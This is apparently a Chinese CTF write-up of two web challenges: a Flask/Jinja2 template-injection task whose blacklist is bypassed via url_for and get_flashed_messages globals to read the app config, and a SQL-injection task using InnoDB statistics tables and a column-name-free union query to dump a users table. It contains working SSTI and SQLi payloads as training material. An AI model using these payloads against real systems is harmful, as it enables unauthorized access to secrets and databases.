[WesternCTF2018]shrine
介绍
模板其实就是对于传入的数据进行解析,然后生成html文件,然后在返回给浏览器进行展示,而这其中就用到了模板渲染和模板引擎
模板注入的根本原因就在于客户端向服务器传输的参数被解析,由于模板中有较多函数,所以,很多情况下模板注入可以导致远程代码执行,模板注入大概分为这几种:客户端模板注入、服务端模板注入、模板引擎注入。在本题中就是flask/jinja模板注入
考点:
- Flask模版注入
- url_for()和get_flashed_messages()函数绕过黑名单
- globals、__dict__等变量含义
启动环境:
题目源码:
import flask
import os
# app是Flask的实例,它接收 包 或者 模块 的名字作为参数,但一般都是传递__name__
# __name__ --- 是本 文本文件的名字
app = flask.Flask(__name__)
# 自定义配置
app.config['FLAG'] = os.environ.pop('FLAG')
# __file__ --- 表示显示文件当前的位置
@app.route('/')
def index():
return open(__file__).read()
@app.route('/shrine/<path:shrine>')
def shrine(shrine):
# 用来过滤的函数
def safe_jinja(s):
# 替换掉所有的圆括号
s = s.replace('(', '').replace(')', '')
# 一个黑名单
blacklist = ['config', 'self']
# 返回 {{set config=None}} {{set self=None}} 用户输入
# 过滤了 config 和 self
return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s
# 进行渲染
return flask.render_template_string(safe_jinja(shrine))
if __name__ == '__main__':
app.run(debug=True)
我们再来分析一下这段代码
首先代码中定义了两个类
@app.route('/')
def index():
return open(__file__).read()
这个类的作用很简单,当访问/路径时就用来阅读文件内容
@app.route('/shrine/<path:shrine>')
def shrine(shrine):
def safe_jinja(s):
s = s.replace('(', '').replace(')', '')
blacklist = ['config', 'self']
return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s
return flask.render_template_string(safe_jinja(shrine))
这个类通过flask模板返回一个值,这个值是经过处理的
执行这段代码的时候,会传入一个值给参数s,然后参数s进行替换,会将传进去的‘(’ 和 ‘)替换成’ ’ ,然后下面blacklist是黑名单,也就是说过滤了config,self关键字,如果没有过滤可以直接{{config}}即可查看所有app.config内容,但是这里不行
return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s
这段代码把黑名单的东西遍历并设为空
我们知道,在safe_jinja()方法中:
- 首先replace()会将()替换为空
- 其中黑名单处理会将config和self替换为None
若不存在黑名单,可以使用{{self.__dict__}}读取
关键点:
/shrine/<path:shrine>路径存在ssti,但是进行了过滤- 过滤了 () ---- 括号,那就无法使用os模块执行命令,<type ‘file’>也无法使用。感觉通过命令执行来看flag这条路被堵死了
- config 和 self 无法使用。如果这道题没有过滤config 和 self 的话,可以执行:
{{config.FLAG}}和{{self.__dict__}}读取内容
这里还有个知识点就是python的一些内置函数,url_for和get_flashed_messages,通过这些python的内置函数,我们可以读取config的一些信息
- url_for() ---- 一般我们通过一个url即可执行到一个函数,如果知道一个函数,如何去获得url呢?url_for函数可以实现这个功能。url_for() 接收两个及两个以上的参数,以函数名作为第一个参数,后面的参数是url的命名规则
- get_flashed_messages() ---- 返回之前在Flask中通过 flash() 传入的闪现信息列表在渲染模板时,不需要手动分配
- 可以直接在 模板 中使用的 模板变量 及 函数:config、request、url_for()、get_flashed_messages()
使用 url_for() 和 get_flashed_messages() 函数绕过过滤
利用url_for函数查看全局变量字典
/shrine/{{url_for.__globals__}}
发现Flask:‘current_app’: <Flask ‘app’>
发现了current_app,为什么重点关注这个呢?因为这个web是用了模板引擎的,那么我们就能想到很多模板具有注入,有客户端模板注入,服务端模板注入,模板引擎注入,所以这里我们要重点关注一下这个current_app,
(current_app意思应该是当前app)
这个里边的信息肯定有猫腻,所以接下来我们查看这个里面的config
payload 如下:
/shrine/{{url_for.__globals__['current_app'].config}}
得到flag
二:
get_flashed_messages方法
返回之前在Flask中通过 flash() 传入的闪现信息列表。把字符串对象表示的消息加入到一个消息队列中,然后通过调用 get_flashed_messages() 方法取出(闪现信息只能取出一次,取出后闪现信息会被清空)。
同理;
/shrine/{{get_flashed_messages.__globals__['current_app'].config}}
得到flag
[SWPU2019]Web1
无列名注入
概念
在我们进行sql注入的时候,有时候information_schema这个库可能会因为过滤而无法调用,这时我们就不能通过这个库来查出表名和列名。不过我们可以通过两种方法来查出表名:
- InnoDb引擎
从MYSQL5.5.8开始,InnoDB成为其默认存储引擎。而在MYSQL5.6以上的版本中,inndb增加了innodb_index_stats和innodb_table_stats两张表,这两张表中都存储了数据库和其数据表的信息,但是没有存储列名。 - sys数据库
在5.7以上的MYSQL中,新增了sys数据库,该库的基础数据来自information_schema和performance_chema,其本身不存储数据。可以通过其中的schema_auto_increment_columns来获取表名。
但是上述两种方法都只能查出表名,无法查到列名,这时我们就要用到无列名注入了。无列名注入,顾名思义,就是不需要列名就能注出数据的注入。
启动
一个登录页面,先去试着注册一个账号
老样子试图注册admin,发现用户已存在
那先随便注册个123 进去
然后申请一下发布广告
发现实现了一个留言板的功能,考虑一下有没有存在注入的可能。
申请一个1’发现存在着回显
查看详情报错,说明存在注入。fuzz一下发现过滤了空格,or,and,#。那么就直接通过联合查询确定字段数。
确定字段数为22,可显字段是2和3,查一下数据库版本和user。
接着查表名的时候发现or被过滤,且无法通过大小写和双写绕过,那么information_schema因为含有or,所以也没法使用。这里有两种方法可以绕过
这里我们使用innodb绕过。
payload:
-1'union/**/select/**/1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/from/**/mysql.innodb_table_stats/**/where/**/database_name=database()&&'1'='1
查到有ads和users两张表
因为上述两种方法都没法注出列名,所以接下来用无列名注入。
构造一下payload:
-1'/**/union/**/select/**/1,(select/**/group_concat(2)/**/from/**/(select/**/1,2,3/**/union/**/select*from/**/users)n),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22&&'1'='1
查到了一列内容
再查另一列
-1'/**/union/**/select/**/1,(select/**/group_concat(3)/**/from/**/(select/**/1,2,3/**/union/**/select*from/**/users)n),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22&&'1'='1
得到flag
3397
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
